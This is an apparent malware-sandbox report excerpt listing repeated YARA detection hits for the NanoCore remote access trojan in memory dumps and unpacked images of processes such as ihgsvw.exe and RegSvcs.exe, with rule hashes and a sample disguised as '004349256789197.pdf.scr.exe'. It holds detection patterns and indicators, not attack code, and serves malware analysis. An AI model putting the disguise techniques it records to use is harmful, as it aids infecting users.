      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: initial sample, Static PE information: Filename: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe, Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe, Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe, Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe, Section loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe, Section loaded: sfc.dll
      Source: 004349256789197.pdf.scr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
